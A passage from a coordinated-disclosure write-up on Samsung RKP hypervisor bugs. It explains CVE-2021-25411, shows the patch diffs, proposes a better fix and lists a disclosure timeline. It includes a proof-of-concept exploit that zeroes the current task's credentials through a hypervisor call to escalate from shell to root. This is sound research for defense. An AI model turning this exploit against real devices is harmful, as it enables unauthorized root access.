    - Ensure signature checking is enabled (it was disabled on some devices)

After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3.

Changes were made to the dynamic_load_check function. As suggested, checks were added to ensure that both code segments are within the binary's address range. The new checks don't account for integer overflows on all the base + size additions, but we noticed that this was changed later in the October security update.

int64_t dynamic_load_check(rkp_dynamic_load_t *rkp_dyn) {
    // ...

    if (rkp_dyn->type == RKP_DYN_MODULE)
        return -1;
+    binary_base = rkp_dyn->binary_base;
+    binary_end = rkp_dyn->binary_size + binary_base;
+    code_base1 = rkp_dyn->code_base1;
+    code_end1 = rkp_dyn->code_size1 + code_base1;
+    if (code_base1 < binary_base || code_end1 > binary_end) {
+        uh_log('L', "rkp_dynamic.c", 71, "RKP_21f66fc1");
+        return -1;
+    }
+    if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
+        code_base2 = rkp_dyn->code_base2;
+        code_end2 = rkp_dyn->code_size2 + code_base2;
+        if (code_base2 < binary_base || code_end2 > binary_end) {
+            uh_log('L', "rkp_dynamic.c", 77, "RKP_915550ac");
+            return -1;
+        }
+        if ((code_base1 > code_base2 && code_base1 < code_end2)
+                || (code_base2 > code_base1 && code_base2 < code_end1)) {
+            uh_log('L', "rkp_dynamic.c", 83, "RKP_67b1bc82");
+            return -1;
+        }
+    }
    binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
    if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
        uh_log('L', "rkp_dynamic.c", 91, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,rkp_dyn->binary_size);
        return -1;
    }
    if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size))
        uh_log('D', "rkp_dynamic.c", 96, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
    return 0;
}

Since the binary's address range is then checked against the ro_bitmap using pgt_bitmap_overlaps_range, it is no longer possible to change memory that is R-X in the stage 2 to RWX. It is still possible to change memory that is RW- to RWX, but this is not a problem in itself: there are already RWX pages in the stage 2, and the hypervisor ensures that if such a page is mapped as executable in the stage 1, it is made read-only in the stage 2.

Writing to read-only kernel memory

SVE-2021-20176 (CVE-2021-25411): Vulnerable api in RKP allows attackers to write read-only kernel memory

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory.
The patch adds a proper address validation check to prevent unprivileged write to kernel memory.

Vulnerability

The last vulnerability comes from a limitation of virt_to_phys_el1, the function used by RKP to convert a virtual address into a physical address.

It uses the AT S12E1R (Address Translate Stages 1 and 2 EL1 Read) and AT S12E1W (Address Translate Stages 1 and 2 EL1 Write) instructions that perform a full (stages 1 and 2) address translation, as if the kernel was trying to read or write, respectively, at that virtual address. By checking the PAR_EL1 (Physical Address Register) register, the function can know if the address translation succeeded and retrieve the physical address.

Most specifically, virt_to_phys_el1 uses AT S12E1R, and if that first address translation fails, it then uses AT S12E1W. That means that any virtual address that can be read and/or written by the kernel can be successfully translated by the function.

uint64_t virt_to_phys_el1(uint64_t addr) {
  // ...

  // Ignore null VAs.
  if (!addr) {
    return 0;
  }
  cs_enter(s2_lock);
  // Try to translate the VA using the AT S12E1R instruction (simulate a kernel read).
  ats12e1r(addr);
  isb();
  par_el1 = get_par_el1();
  // Check the PAR_EL1 register to see if the AT succeeded.
  if ((par_el1 & 1) != 0) {
    // Try again to translate the VA using the AT S12E1W instruction (simulate a kernel write).
    ats12e1w(addr);
    isb();
    par_el1 = get_par_el1();
  }
  cs_exit(s2_lock);
  // Check the PAR_EL1 register to see if the AT succeeded.
  if ((par_el1 & 1) != 0) {
    isb();
    // If the MMU is enabled, log and print the stack contents (only once).
    if ((get_sctlr_el1() & 1) != 0) {
      uh_log('W', "vmm.c", 135, "%sRKP_b0a499dd %p", "virt_to_phys_el1", addr);
      if (!dword_87035098) {
        dword_87035098 = 1;
        print_stack_contents();
      }
      dword_87035098 = 0;
    }
    return 0;
  }
  // If the AT succeeded, return the output PA.
  else {
    return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
  }
}

The issue is that functions call virt_to_phys_el1 to convert a kernel VA, sometimes to read from the resulting address, other times to write to it. However, since virt_to_phys_el1 successfully translates a VA even if it is only readable, we can abuse this oversight to write to memory that is read-only from the kernel.

Exploitation

Interesting targets in kernel memory include anything that is read-only in the stage 2, such as the kernel page tables, struct cred, struct task_security_struct, etc. We also need to find a command handler that uses the virt_to_phys_el1 function, writes to the translated address, and can be called after the hypervisor is fully initialized. There are only two command handlers that fit the bill:

  • rkp_cmd_rkp_robuffer_alloc, which writes the address of the newly allocated page;
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
    *virt_to_phys_el1(ret_va) = page;
  }
  regs->x0 = page;
  return 0;
}
  • rkp_cmd_dynamic_load, which writes the return code of the executed subcommand.
int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  regs->x0 = res;
  return res;
}

In our exploit, we have used rkp_cmd_dynamic_load because when an invalid subcommand is specified, the return code and thus the value that is written to the target address is 0. This is very useful, for example, to change a UID/GID to 0 (root).

Proof of Concept

#define UH_APP_RKP 0xC300C002

#define RKP_DYNAMIC_LOAD 0x20

void print_ids() {
    uid_t ruid, euid, suid;
    getresuid(&ruid, &euid, &suid);
    printf("Uid: %d %d %d\n", ruid, euid, suid);

    gid_t rgid, egid, sgid;
    getresgid(&rgid, &egid, &sgid);
    printf("Gid: %d %d %d\n", rgid, egid, sgid);
}

void write_zero(uint64_t rkp_dyn_p, uint64_t ret_p) {
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, 42, rkp_dyn_p, ret_p);
}

void exploit() {
    /* print the old credentials */
    print_ids();

    /* get the struct cred of the current task */
    uint64_t current = kernel_get_current();
    uint64_t cred = kernel_read(current + 0x7B0);

    /* allocate the argument structure */
    uint64_t rkp_dyn_p = kernel_alloc(0x38);
    /* zero the fields of the struct cred */
    for (int i = 4; i < 0x24; i += 4)
        write_zero(rkp_dyn_p, cred + i);

    /* print the new credentials */
    print_ids();
}

Uid: 2000 2000 2000
Gid: 2000 2000 2000
Uid: 0 0 0
Gid: 0 0 0

By running the proof of concept, we can see that the current task's credentials changed from 2000 (shell) to 0 (root).

The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1. The bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here is the immediate remediation step that we suggested to Samsung:

- Add a flag to virt_to_phys_el1 to specify if it should check if the memory
needs to be readable or writable from the kernel, or split this function in two

After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3.

Changes were made to the rkp_cmd_rkp_robuffer_alloc function. It now ensures the kernel-provided address is marked as FREE in the physmap before writing to it and triggers a policy violation if it isn't.

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t *regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
-    *virt_to_phys_el1(ret_va) = page;
+    ret_pa = virt_to_phys_el1(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    *ret_pa = page;
+    rkp_phys_map_unlock(ret_pa);
  }
  regs->x0 = page;
  return 0;
}

Similar changes were made to the rkp_cmd_dynamic_load function.

int64_t rkp_cmd_dynamic_load(saved_regs_t *regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
-  if (ret_va)
-    *virt_to_phys_el1(ret_va) = res;
+  if (ret_va) {
+    ret_pa = rkp_get_pa(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    rkp_phys_map_unlock(ret_pa);
+    *ret_pa = res;
+  }
  regs->x0 = res;
  return res;
}

The patch works right now because there are no other command handlers accessible after initialization that use virt_to_phys_el1 before writing to the address, but it only fixes the exploitation paths and not the root cause. It is possible that in the future, when a new command handler is added, the physmap check is forgotten and the vulnerability is thus reintroduced. Furthermore, the patch also assumes that memory that is read-only from the kernel will never be marked as FREE. While this holds true for now, it might change in the future as well.

A better solution would have been to add an argument to virt_to_phys_el1 specifying whether the translated address needs to be readable or writable by the kernel.
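
To illustrate, here is a minimal sketch of what we had in mind, reusing the primitives from the decompiled function above; this is our proposal, not Samsung's code.

typedef enum { EL1_ACCESS_READ, EL1_ACCESS_WRITE } el1_access_t;

uint64_t virt_to_phys_el1_checked(uint64_t addr, el1_access_t access) {
  uint64_t par_el1;

  if (!addr) {
    return 0;
  }
  cs_enter(s2_lock);
  // Only perform the address translation matching the access the caller will make.
  if (access == EL1_ACCESS_WRITE) {
    ats12e1w(addr);
  } else {
    ats12e1r(addr);
  }
  isb();
  par_el1 = get_par_el1();
  cs_exit(s2_lock);
  // PAR_EL1 bit 0 set means the translation failed for the requested access type.
  if ((par_el1 & 1) != 0) {
    return 0;
  }
  return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
}

A command handler that intends to write through the returned pointer would then pass EL1_ACCESS_WRITE, making the hypervisor refuse addresses that are only readable from the kernel.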

Conclusion

In this conclusion, we would like to give you our thoughts about Samsung RKP and its implementation as of early 2021.

With regards to the implementation, the codebase has been around for a few years already, and it shows. Complexity increased as new features were added, and bug patches had to be made here and there. This might explain how mistakes like the ones revealed today could have been made and why configuration issues happen so frequently. It is very likely that there are other bugs lurking in the code that we have glossed over. In addition, we feel that Samsung has made some strange choices, both in the design process and in their bug patches. For example, duplicating information that is already in the stage 2 page tables (for example, the S2AP bit and the ro_bitmap) is very error-prone. They also seem to be patching specific exploitation paths instead of the root cause of vulnerabilities, which is kind of a red flag.

Leaving these flaws aside for a moment and considering the overall impact of Samsung RKP on device security, we believe that it does contribute a little bit to making the device more secure as a defense-in-depth measure. It makes it harder for an attacker to achieve code execution in the kernel. However, it is certainly not a panacea. When writing an Android kernel exploit, an attacker will need to find an RKP bypass (which is different from a vulnerability in RKP) to compromise the system. Unfortunately, there are known bypasses that still need to be addressed by Samsung.

Timeline

SVE-2021-20178

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 08, 2021 - Notification that the update patching the vulnerability has been released.
  • Jul. 20, 2021 - We reopen the issue after binary diffing the fix.
  • Jul. 30, 2021 - The issue will be patched in the October security update.
  • Oct. 05, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20179

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20176

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 29, 2021 - No updates at the moment.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - Vulnerability is confirmed.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - We ask for updates.
  • Jun. 23, 2021 - Notification that the update patching the vulnerability has been released.